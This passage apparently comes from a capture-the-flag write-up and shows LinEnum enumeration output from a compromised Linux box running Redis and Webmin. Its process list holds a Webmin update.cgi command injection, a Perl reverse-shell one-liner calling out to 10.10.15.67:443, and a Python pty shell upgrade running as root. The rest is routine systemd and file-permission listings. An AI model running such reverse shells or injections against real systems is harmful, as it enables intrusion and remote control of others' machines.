message+ 350 0.0 0.4 50040 4124 ? Ss 06:33
0:00 /usr/bin/dbus-daemon --system --address=systemd: --
nofork --nopidfile --systemd-activation --syslog-only
root 435 0.0 0.0 0 0? I< 06:33 0:00
[ttm_swap]
root 437 0.0 0.0 0 0? S 06:33 0:00 [irq/16-
vmwgfx]
root 566 0.0 0.6 72296 6180 ? Ss 06:33 0:00 /
usr/sbin/sshd -D
root 578 0.0 0.1 16180 1736 tty1 Ss+ 06:33
0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
redis 585 0.0 0.4 51572 4140 ? Ssl 06:33 0:00 /
usr/bin/redis-server 0.0.0.0:6379
root 595 0.0 1.7 331332 15900 ? Ss 06:33 0:00 /
usr/sbin/apache2 -k start
www-data 597 0.0 1.1 335848 10244 ? S 06:33
0:00 /usr/sbin/apache2 -k start
www-data 598 0.0 1.1 335872 10372 ? S 06:33
www-data 599 0.0 1.1 335840 10240 ? S 06:33
www-data 602 0.0 1.1 335872 10376 ? S 06:33
30/59
root 676 0.1 3.2 95308 29640 ? Ss 06:33 0:01 /
usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/
miniserv.conf
www-data 1229 0.0 1.1 335800 10172 ? S 06:35
www-data 1258 0.0 1.1 335856 10356 ? S 06:35
www-data 1950 0.0 1.1 335856 10360 ? S 06:38
www-data 2059 0.0 1.1 335856 10352 ? S 06:38
root 2281 0.0 0.0 0 0? I 06:38 0:00
[kworker/u256:0]
www-data 2618 0.0 1.1 335800 10176 ? S 06:40
root 3022 0.0 0.0 0 0? I 06:44 0:00
[kworker/u256:1]
www-data 3307 0.0 1.1 335792 10164 ? S 06:47
root 3380 0.0 0.7 107988 7000 ? Ss 06:48 0:00
sshd: redis [priv]
redis 3385 0.0 0.8 76616 7368 ? Ss 06:48 0:00 /
lib/systemd/systemd --user
redis 3386 0.0 0.2 193380 2156 ? S 06:48 0:00
(sd-pam)
redis 3434 0.0 0.4 108096 4492 ? S 06:48 0:00
sshd: redis@pts/0
redis 3439 0.0 0.5 22484 4992 pts/0 Ss 06:48 0:00
-bash
root 3486 0.0 5.1 118884 47068 ? S 06:49 0:00 /
usr/share/webmin/package-updates/update.cgi
root 3493 0.0 0.0 4628 780 ? S 06:49 0:00 sh
-c apt-get -y install apt ;python -c "import
</tmp/.webmin/535820_3486_2_update.cgi 2>&1
root 3503 0.0 0.9 33400 9120 ? S 06:49 0:00
python -c import
31/59
root 3504 0.0 0.0 4628 816 ? S 06:49 0:00 /
bin/sh -i
root 3616 0.2 5.1 118892 47064 ? S 06:50 0:00 /
usr/share/webmin/package-updates/update.cgi
root 3636 0.0 3.2 95308 29884 ? S 06:50 0:00 /
miniserv.conf
root 3671 0.0 0.0 0 0? Z 06:50 0:00 [sh]
<defunct>
root 3689 0.0 0.7 28772 6628 ? S 06:50 0:00
perl -MIO -e $p=fork;exit,if($p);foreach my $key(keys %ENV)
{if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new
IO::Socket::INET(PeerAddr,"10.10.15.67:443");STDIN-
>fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/)
{system $1;}};
root 3718 0.0 3.4 97744 31592 ? S 06:51 0:00 /
miniserv.conf
redis 3737 0.0 0.4 13676 4036 pts/0 S+ 06:51
0:00 /bin/bash ./LinEnum.sh
redis 3738 0.1 0.3 13808 2980 pts/0 S+ 06:51
redis 3739 0.0 0.0 7476 748 pts/0 S+ 06:51 0:00
tee -a
root 3742 0.0 0.7 33084 7040 ? S 06:51 0:00
python -c import pty; pty.spawn("/bin/bash")
root 3743 0.0 0.3 18640 3524 pts/1 Ss+ 06:51
0:00 /bin/bash
root 3919 0.0 3.2 95308 29948 ? S 06:51 0:00 /
miniserv.conf
redis 3937 0.0 0.3 13808 2788 pts/0 S+ 06:51
redis 3938 0.0 0.3 39664 3668 pts/0 R+ 06:51
0:00 ps aux
[-] Process binaries and associated permissions (from above

32/59
list):
1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 23:28 /bin/bash
0 lrwxrwxrwx 1 root root 4 Aug 24 11:25 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Jul 22 17:45 /lib/systemd/
systemd
128K -rwxr-xr-x 1 root root 127K Jul 22 17:45 /lib/systemd/
systemd-journald
systemd-logind
systemd-resolved
systemd-timesyncd
systemd-udevd
56K -rwxr-xr-x 1 root root 56K Oct 15 2018 /sbin/agetty
0 lrwxrwxrwx 1 root root 20 Jul 22 17:45 /sbin/init -> /lib/
systemd/systemd
232K -rwxr-xr-x 1 root root 232K Jun 10 19:05 /usr/bin/dbus-
daemon
2.1M -rwxr-xr-x 2 root root 2.1M Nov 19 2018 /usr/bin/perl
0 lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3
-> python3.6
0 lrwxrwxrwx 1 root root 15 Jul 14 20:20 /usr/bin/redis-
server -> redis-check-rdb
180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/
accountsservice/accounts-daemon
656K -rwxr-xr-x 1 root root 656K Jul 16 19:14 /usr/sbin/
apache2
48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron
668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/
rsyslogd
772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd
8.0K -rwxr-xr-x 1 root root 4.7K May 5 2019 /usr/share/
webmin/package-updates/update.cgi
[-] /etc/init.d/ binary permissions:

33/59
total 124
drwxr-xr-x 2 root root 4096 Oct 25 16:38 .
-rwxr-xr-x 1 root root 8181 Jul 16 19:14 apache2
-rwxr-xr-x 1 root root 2489 Jul 16 19:14 apache-htcacheclean
-rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor
-rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh
-rwxr-xr-x 1 root root 3049 Nov 16 2017 cron
-rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus
-rwxr-xr-x 1 root root 985 Mar 18 2019 grub-common
-rwxr-xr-x 1 root root 3809 Feb 14 2018 hwclock.sh
-rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance
-rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod
-rwxr-xr-x 1 root root 4597 Nov 25 2016 networking
-rwxr-xr-x 1 root root 1366 Apr 4 2019 plymouth
-rwxr-xr-x 1 root root 752 Apr 4 2019 plymouth-log
-rwxr-xr-x 1 root root 1191 Jan 17 2018 procps
-rwxr-xr-x 1 root root 1702 Aug 25 22:08 redis_6379
-rwxr-xr-x 1 root root 1614 Apr 2 2018 redis-server
-rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync
-rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog
-rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh
-rwxr-xr-x 1 root root 5974 Apr 20 2018 udev
-rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw
-rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd
-rwxr-xr-x 1 root root 1853 May 5 2019 webmin
[-] /lib/systemd/* config file permissions:

/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root 36K Oct 25 16:44 system
drwxr-xr-x 2 root root 4.0K Oct 25 16:44 system-generators
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 system-sleep
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 network
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 system-preset
-rw-r--r-- 1 root root 2.3M Jul 22 17:45 libsystemd-
34/59
shared-237.so
-rw-r--r-- 1 root root 699 Jul 22 17:45 resolv.conf
-rwxr-xr-x 1 root root 1.3K Jul 22 17:45 set-cpufreq
-rwxr-xr-x 1 root root 1.6M Jul 22 17:45 systemd
-rwxr-xr-x 1 root root 6.0K Jul 22 17:45 systemd-ac-power
-rwxr-xr-x 1 root root 18K Jul 22 17:45 systemd-backlight
-rwxr-xr-x 1 root root 11K Jul 22 17:45 systemd-binfmt
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-cgroups-
agent
-rwxr-xr-x 1 root root 22K Jul 22 17:45 systemd-cryptsetup
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-dissect
-rwxr-xr-x 1 root root 18K Jul 22 17:45 systemd-fsck
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-fsckd
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-growfs
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-hibernate-
resume
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-hostnamed
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-initctl
-rwxr-xr-x 1 root root 127K Jul 22 17:45 systemd-journald
-rwxr-xr-x 1 root root 35K Jul 22 17:45 systemd-localed
-rwxr-xr-x 1 root root 215K Jul 22 17:45 systemd-logind
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-makefs
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-modules-
load
-rwxr-xr-x 1 root root 1.6M Jul 22 17:45 systemd-networkd
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-networkd-
wait-online
-rwxr-xr-x 1 root root 11K Jul 22 17:45 systemd-quotacheck
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-random-
seed
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-remount-fs
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-reply-
password
-rwxr-xr-x 1 root root 371K Jul 22 17:45 systemd-resolved
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-rfkill
-rwxr-xr-x 1 root root 43K Jul 22 17:45 systemd-shutdown
-rwxr-xr-x 1 root root 19K Jul 22 17:45 systemd-sleep
-rwxr-xr-x 1 root root 23K Jul 22 17:45 systemd-socket-
35/59
proxyd
-rwxr-xr-x 1 root root 11K Jul 22 17:45 systemd-sulogin-shell
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-sysctl
-rwxr-xr-x 1 root root 1.3K Jul 22 17:45 systemd-sysv-install
-rwxr-xr-x 1 root root 27K Jul 22 17:45 systemd-timedated
-rwxr-xr-x 1 root root 39K Jul 22 17:45 systemd-timesyncd
-rwxr-xr-x 1 root root 571K Jul 22 17:45 systemd-udevd
-rwxr-xr-x 1 root root 15K Jul 22 17:45 systemd-update-utmp
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-user-
sessions
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-veritysetup
-rwxr-xr-x 1 root root 10K Jul 22 17:45 systemd-volatile-root
drwxr-xr-x 2 root root 4.0K Apr 20 2018 system-shutdown
/lib/systemd/system:
total 844K
-rw-r--r-- 1 root root 1.2K Oct 25 14:10 redis-server.service
drwxr-xr-x 2 root root 4.0K Aug 25 18:24 apache2.service.d
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 halt.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 initrd-switch-
root.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 multi-
user.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33
poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:33 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30
graphical.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 timers.target.wants
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Aug 24 11:30 user@.service.d
lrwxrwxrwx 1 root root 14 Jul 22 17:45 autovt@.service ->
36/59
getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootlogd.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootlogs.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 bootmisc.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkfs.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkroot-
bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 checkroot.service -> /
dev/null
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 console-getty.service
-rw-r--r-- 1 root root 1.3K Jul 22 17:45 container-
getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 cryptdisks-
early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 cryptdisks.service -> /
dev/null
lrwxrwxrwx 1 root root 13 Jul 22 17:45 ctrl-alt-del.target ->
reboot.target
lrwxrwxrwx 1 root root 25 Jul 22 17:45 dbus-
org.freedesktop.hostname1.service -> systemd-
hostnamed.service
org.freedesktop.locale1.service -> systemd-localed.service
org.freedesktop.login1.service -> systemd-logind.service
org.freedesktop.timedate1.service -> systemd-
timedated.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 debug-shell.service
lrwxrwxrwx 1 root root 16 Jul 22 17:45 default.target ->
graphical.target
-rw-r--r-- 1 root root 797 Jul 22 17:45 emergency.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 fuse.service -> /dev/
null
37/59
-rw-r--r-- 1 root root 2.0K Jul 22 17:45 getty@.service
-rw-r--r-- 1 root root 342 Jul 22 17:45 getty-static.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 halt.service -> /dev/
null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 hostname.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 hwclock.service -> /
dev/null
-rw-r--r-- 1 root root 670 Jul 22 17:45 initrd-cleanup.service
-rw-r--r-- 1 root root 830 Jul 22 17:45 initrd-parse-etc.service
-rw-r--r-- 1 root root 589 Jul 22 17:45 initrd-switch-
root.service
-rw-r--r-- 1 root root 704 Jul 22 17:45 initrd-udevadm-
cleanup-db.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 killprocs.service -> /
dev/null
lrwxrwxrwx 1 root root 28 Jul 22 17:45 kmod.service ->
systemd-modules-load.service
-rw-r--r-- 1 root root 717 Jul 22 17:45 kmod-static-
nodes.service
lrwxrwxrwx 1 root root 28 Jul 22 17:45 module-init-
tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 motd.service -> /dev/
null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountall-
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountall.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45
mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountkernfs.service -
> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountnfs-
lrwxrwxrwx 1 root root 9 Jul 22 17:45 mountnfs.service -> /
dev/null
-rw-r--r-- 1 root root 362 Jul 22 17:45 ondemand.service
lrwxrwxrwx 1 root root 22 Jul 22 17:45 procps.service ->
38/59
systemd-sysctl.service
-rw-r--r-- 1 root root 609 Jul 22 17:45 quotaon.service
-rw-r--r-- 1 root root 716 Jul 22 17:45 rc-local.service
lrwxrwxrwx 1 root root 16 Jul 22 17:45 rc.local.service -> rc-
local.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rcS.service -> /dev/
null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 reboot.service -> /
dev/null
-rw-r--r-- 1 root root 788 Jul 22 17:45 rescue.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 rmnologin.service -> /
dev/null
lrwxrwxrwx 1 root root 15 Jul 22 17:45 runlevel0.target ->
poweroff.target
rescue.target
multi-user.target
multi-user.target
multi-user.target
graphical.target
reboot.target
lrwxrwxrwx 1 root root 9 Jul 22 17:45 sendsigs.service -> /
dev/null
-rw-r--r-- 1 root root 1.5K Jul 22 17:45 serial-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 single.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 stop-bootlogd.service
-> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 stop-bootlogd-
single.service -> /dev/null
-rw-r--r-- 1 root root 554 Jul 22 17:45 suspend-then-
hibernate.target
39/59
-rw-r--r-- 1 root root 724 Jul 22 17:45 systemd-ask-password-
console.service
-rw-r--r-- 1 root root 752 Jul 22 17:45 systemd-ask-password-
wall.service
-rw-r--r-- 1 root root 752 Jul 22 17:45 systemd-
backlight@.service
-rw-r--r-- 1 root root 999 Jul 22 17:45 systemd-binfmt.service
-rw-r--r-- 1 root root 537 Jul 22 17:45 systemd-exit.service
-rw-r--r-- 1 root root 551 Jul 22 17:45 systemd-fsckd.service
-rw-r--r-- 1 root root 540 Jul 22 17:45 systemd-fsckd.socket
-rw-r--r-- 1 root root 714 Jul 22 17:45 systemd-fsck-
root.service
-rw-r--r-- 1 root root 715 Jul 22 17:45 systemd-fsck@.service
-rw-r--r-- 1 root root 584 Jul 22 17:45 systemd-halt.service
-rw-r--r-- 1 root root 671 Jul 22 17:45 systemd-hibernate-
resume@.service
hibernate.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-
hostnamed.service
-rw-r--r-- 1 root root 818 Jul 22 17:45 systemd-hwdb-
update.service
-rw-r--r-- 1 root root 559 Jul 22 17:45 systemd-hybrid-
sleep.service
-rw-r--r-- 1 root root 551 Jul 22 17:45 systemd-initctl.service
-rw-r--r-- 1 root root 686 Jul 22 17:45 systemd-journald-
audit.socket
journald.service
-rw-r--r-- 1 root root 771 Jul 22 17:45 systemd-journal-
flush.service
-rw-r--r-- 1 root root 597 Jul 22 17:45 systemd-kexec.service
-rw-r--r-- 1 root root 1.1K Jul 22 17:45 systemd-localed.service
-rw-r--r-- 1 root root 1.5K Jul 22 17:45 systemd-logind.service
-rw-r--r-- 1 root root 733 Jul 22 17:45 systemd-machine-id-
commit.service
-rw-r--r-- 1 root root 1007 Jul 22 17:45 systemd-modules-
load.service
40/59
networkd.service
-rw-r--r-- 1 root root 740 Jul 22 17:45 systemd-networkd-wait-
online.service
poweroff.service
quotacheck.service
-rw-r--r-- 1 root root 792 Jul 22 17:45 systemd-random-
seed.service
-rw-r--r-- 1 root root 588 Jul 22 17:45 systemd-reboot.service
-rw-r--r-- 1 root root 833 Jul 22 17:45 systemd-remount-
fs.service
resolved.service
-rw-r--r-- 1 root root 724 Jul 22 17:45 systemd-rfkill.service
suspend.service
-rw-r--r-- 1 root root 573 Jul 22 17:45 systemd-suspend-then-
hibernate.service
-rw-r--r-- 1 root root 693 Jul 22 17:45 systemd-sysctl.service
timedated.service
timesyncd.service
-rw-r--r-- 1 root root 659 Jul 22 17:45 systemd-tmpfiles-
clean.service
-rw-r--r-- 1 root root 764 Jul 22 17:45 systemd-tmpfiles-setup-
dev.service
-rw-r--r-- 1 root root 744 Jul 22 17:45 systemd-tmpfiles-
setup.service
-rw-r--r-- 1 root root 985 Jul 22 17:45 systemd-udevd.service
-rw-r--r-- 1 root root 863 Jul 22 17:45 systemd-udev-
settle.service
-rw-r--r-- 1 root root 755 Jul 22 17:45 systemd-udev-
trigger.service
-rw-r--r-- 1 root root 797 Jul 22 17:45 systemd-update-utmp-
runlevel.service
41/59
-rw-r--r-- 1 root root 794 Jul 22 17:45 systemd-update-
utmp.service
-rw-r--r-- 1 root root 628 Jul 22 17:45 systemd-user-
sessions.service
-rw-r--r-- 1 root root 690 Jul 22 17:45 systemd-volatile-
root.service
-rw-r--r-- 1 root root 1.4K Jul 22 17:45 system-update-
cleanup.service
lrwxrwxrwx 1 root root 21 Jul 22 17:45 udev.service ->
systemd-udevd.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountfs.service -> /
dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountnfs.service -
> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 17:45 umountroot.service -
> /dev/null
lrwxrwxrwx 1 root root 27 Jul 22 17:45 urandom.service ->
systemd-random-seed.service
-rw-r--r-- 1 root root 593 Jul 22 17:45 user@.service
lrwxrwxrwx 1 root root 9 Jul 22 17:45 x11-common.service -
> /dev/null
-rw-r--r-- 1 root root 346 Jul 16 19:14 apache2.service
-rw-r--r-- 1 root root 418 Jul 16 19:14 apache2@.service
-rw-r--r-- 1 root root 528 Jul 16 19:14 apache-
htcacheclean.service
-rw-r--r-- 1 root root 537 Jul 16 19:14 apache-
htcacheclean@.service
-rw-r--r-- 1 root root 2.4K Jul 14 20:20 redis-server@.service
-rw-r--r-- 1 root root 161 Jul 8 19:43 motd-news.timer
-rw-r--r-- 1 root root 505 Jun 10 19:05 dbus.service
-rw-r--r-- 1 root root 106 Jun 10 19:05 dbus.socket
-rw-r--r-- 1 root root 326 May 7 2019 apt-daily.service
-rw-r--r-- 1 root root 156 May 7 2019 apt-daily.timer
-rw-r--r-- 1 root root 238 May 7 2019 apt-daily-
upgrade.service
-rw-r--r-- 1 root root 184 May 7 2019 apt-daily-
upgrade.timer
-rw-r--r-- 1 root root 312 Apr 23 2019 console-setup.service
42/59
-rw-r--r-- 1 root root 287 Apr 23 2019 keyboard-setup.service
-rw-r--r-- 1 root root 330 Apr 23 2019 setvtrgb.service
-rw-r--r-- 1 root root 404 Apr 9 2019 ureadahead.service
-rw-r--r-- 1 root root 250 Apr 9 2019 ureadahead-
stop.service
-rw-r--r-- 1 root root 242 Apr 9 2019 ureadahead-stop.timer
-rw-r--r-- 1 root root 412 Apr 4 2019 plymouth-halt.service
-rw-r--r-- 1 root root 426 Apr 4 2019 plymouth-kexec.service
lrwxrwxrwx 1 root root 27 Apr 4 2019 plymouth-
log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root 421 Apr 4 2019 plymouth-
poweroff.service
-rw-r--r-- 1 root root 194 Apr 4 2019 plymouth-quit.service
-rw-r--r-- 1 root root 200 Apr 4 2019 plymouth-quit-
wait.service
-rw-r--r-- 1 root root 244 Apr 4 2019 plymouth-read-
write.service
-rw-r--r-- 1 root root 416 Apr 4 2019 plymouth-
reboot.service
lrwxrwxrwx 1 root root 21 Apr 4 2019 plymouth.service ->
plymouth-quit.service
-rw-r--r-- 1 root root 532 Apr 4 2019 plymouth-start.service
-rw-r--r-- 1 root root 291 Apr 4 2019 plymouth-switch-
root.service
-rw-r--r-- 1 root root 490 Apr 4 2019 systemd-ask-password-
plymouth.path
-rw-r--r-- 1 root root 467 Apr 4 2019 systemd-ask-password-
plymouth.service
-rw-r--r-- 1 root root 368 Jan 9 2019 irqbalance.service
-rw-r--r-- 1 root root 92 Oct 15 2018 fstrim.service
-rw-r--r-- 1 root root 170 Oct 15 2018 fstrim.timer
-rw-r--r-- 1 root root 189 Oct 15 2018 uuidd.service
-rw-r--r-- 1 root root 126 Oct 15 2018 uuidd.socket
-rw-r--r-- 1 root root 618 Oct 15 2018 friendly-
recovery.service
-rw-r--r-- 1 root root 172 Oct 15 2018 friendly-
recovery.target
-rw-r--r-- 1 root root 258 Oct 15 2018 networkd-
43/59
dispatcher.service
-rw-r--r-- 1 root root 173 Aug 6 2018 motd-news.service
-rw-r--r-- 1 root root 290 Apr 24 2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20 2018
runlevel1.target.wants
-rw-r--r-- 1 root root 544 Mar 22 2018 apparmor.service
-rw-r--r-- 1 root root 919 Jan 28 2018 basic.target
-rw-r--r-- 1 root root 419 Jan 28 2018 bluetooth.target
-rw-r--r-- 1 root root 465 Jan 28 2018 cryptsetup-pre.target
-rw-r--r-- 1 root root 412 Jan 28 2018 cryptsetup.target
-rw-r--r-- 1 root root 750 Jan 28 2018 dev-hugepages.mount
-rw-r--r-- 1 root root 665 Jan 28 2018 dev-mqueue.mount
-rw-r--r-- 1 root root 471 Jan 28 2018 emergency.target
-rw-r--r-- 1 root root 541 Jan 28 2018 exit.target
-rw-r--r-- 1 root root 480 Jan 28 2018 final.target
-rw-r--r-- 1 root root 506 Jan 28 2018 getty-pre.target
-rw-r--r-- 1 root root 500 Jan 28 2018 getty.target
-rw-r--r-- 1 root root 598 Jan 28 2018 graphical.target
-rw-r--r-- 1 root root 527 Jan 28 2018 halt.target
-rw-r--r-- 1 root root 509 Jan 28 2018 hibernate.target
-rw-r--r-- 1 root root 530 Jan 28 2018 hybrid-sleep.target
-rw-r--r-- 1 root root 593 Jan 28 2018 initrd-fs.target
-rw-r--r-- 1 root root 561 Jan 28 2018 initrd-root-
device.target
-rw-r--r-- 1 root root 566 Jan 28 2018 initrd-root-fs.target
-rw-r--r-- 1 root root 754 Jan 28 2018 initrd-switch-root.target
-rw-r--r-- 1 root root 763 Jan 28 2018 initrd.target
-rw-r--r-- 1 root root 541 Jan 28 2018 kexec.target
-rw-r--r-- 1 root root 435 Jan 28 2018 local-fs-pre.target
-rw-r--r-- 1 root root 547 Jan 28 2018 local-fs.target
44/59
-rw-r--r-- 1 root root 445 Jan 28 2018 machine.slice
-rw-r--r-- 1 root root 532 Jan 28 2018 multi-user.target
-rw-r--r-- 1 root root 505 Jan 28 2018 network-online.target
-rw-r--r-- 1 root root 502 Jan 28 2018 network-pre.target
-rw-r--r-- 1 root root 521 Jan 28 2018 network.target
-rw-r--r-- 1 root root 554 Jan 28 2018 nss-lookup.target
-rw-r--r-- 1 root root 513 Jan 28 2018 nss-user-lookup.target
-rw-r--r-- 1 root root 394 Jan 28 2018 paths.target
-rw-r--r-- 1 root root 592 Jan 28 2018 poweroff.target
-rw-r--r-- 1 root root 417 Jan 28 2018 printer.target
-rw-r--r-- 1 root root 745 Jan 28 2018 proc-sys-fs-
binfmt_misc.automount
-rw-r--r-- 1 root root 655 Jan 28 2018 proc-sys-fs-
binfmt_misc.mount
-rw-r--r-- 1 root root 583 Jan 28 2018 reboot.target
-rw-r--r-- 1 root root 549 Jan 28 2018 remote-
cryptsetup.target
-rw-r--r-- 1 root root 436 Jan 28 2018 remote-fs-pre.target
-rw-r--r-- 1 root root 522 Jan 28 2018 remote-fs.target
-rw-r--r-- 1 root root 492 Jan 28 2018 rescue.target
-rw-r--r-- 1 root root 540 Jan 28 2018 rpcbind.target
-rw-r--r-- 1 root root 442 Jan 28 2018 shutdown.target
-rw-r--r-- 1 root root 402 Jan 28 2018 sigpwr.target
-rw-r--r-- 1 root root 460 Jan 28 2018 sleep.target
-rw-r--r-- 1 root root 449 Jan 28 2018 slices.target
-rw-r--r-- 1 root root 420 Jan 28 2018 smartcard.target
-rw-r--r-- 1 root root 396 Jan 28 2018 sockets.target
-rw-r--r-- 1 root root 420 Jan 28 2018 sound.target
-rw-r--r-- 1 root root 503 Jan 28 2018 suspend.target
-rw-r--r-- 1 root root 393 Jan 28 2018 swap.target
-rw-r--r-- 1 root root 795 Jan 28 2018 sys-fs-fuse-
connections.mount
-rw-r--r-- 1 root root 558 Jan 28 2018 sysinit.target
-rw-r--r-- 1 root root 767 Jan 28 2018 sys-kernel-
config.mount
-rw-r--r-- 1 root root 710 Jan 28 2018 sys-kernel-
debug.mount
-rw-r--r-- 1 root root 1.4K Jan 28 2018 syslog.socket
45/59
-rw-r--r-- 1 root root 704 Jan 28 2018 systemd-ask-password-
console.path
-rw-r--r-- 1 root root 632 Jan 28 2018 systemd-ask-password-
wall.path
-rw-r--r-- 1 root root 564 Jan 28 2018 systemd-initctl.socket
-rw-r--r-- 1 root root 1.2K Jan 28 2018 systemd-journald-dev-
log.socket
-rw-r--r-- 1 root root 882 Jan 28 2018 systemd-
journald.socket
-rw-r--r-- 1 root root 631 Jan 28 2018 systemd-
networkd.socket
-rw-r--r-- 1 root root 657 Jan 28 2018 systemd-rfkill.socket
-rw-r--r-- 1 root root 490 Jan 28 2018 systemd-tmpfiles-
clean.timer
-rw-r--r-- 1 root root 635 Jan 28 2018 systemd-udevd-
control.socket
-rw-r--r-- 1 root root 610 Jan 28 2018 systemd-udevd-
kernel.socket
-rw-r--r-- 1 root root 445 Jan 28 2018 system.slice
-rw-r--r-- 1 root root 592 Jan 28 2018 system-update.target
-rw-r--r-- 1 root root 445 Jan 28 2018 timers.target
-rw-r--r-- 1 root root 435 Jan 28 2018 time-sync.target
-rw-r--r-- 1 root root 457 Jan 28 2018 umount.target
-rw-r--r-- 1 root root 432 Jan 28 2018 user.slice
-rw-r--r-- 1 root root 493 Jan 25 2018 ssh.service
-rw-r--r-- 1 root root 244 Jan 25 2018 ssh@.service
lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/
null
-rw-r--r-- 1 root root 155 Jan 17 2018
phpsessionclean.service
-rw-r--r-- 1 root root 144 Jan 17 2018 phpsessionclean.timer
-rw-r--r-- 1 root root 216 Jan 16 2018 ssh.socket
-rw-r--r-- 1 root root 741 Dec 18 2017 accounts-
daemon.service
-rw-r--r-- 1 root root 251 Nov 16 2017 cron.service
-rw-r--r-- 1 root root 266 Aug 15 2017 ufw.service
-rw-r--r-- 1 root root 626 Nov 28 2016 ifup@.service
-rw-r--r-- 1 root root 735 Nov 25 2016 networking.service
46/59
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service
/lib/systemd/system/apache2.service.d:
total 4.0K
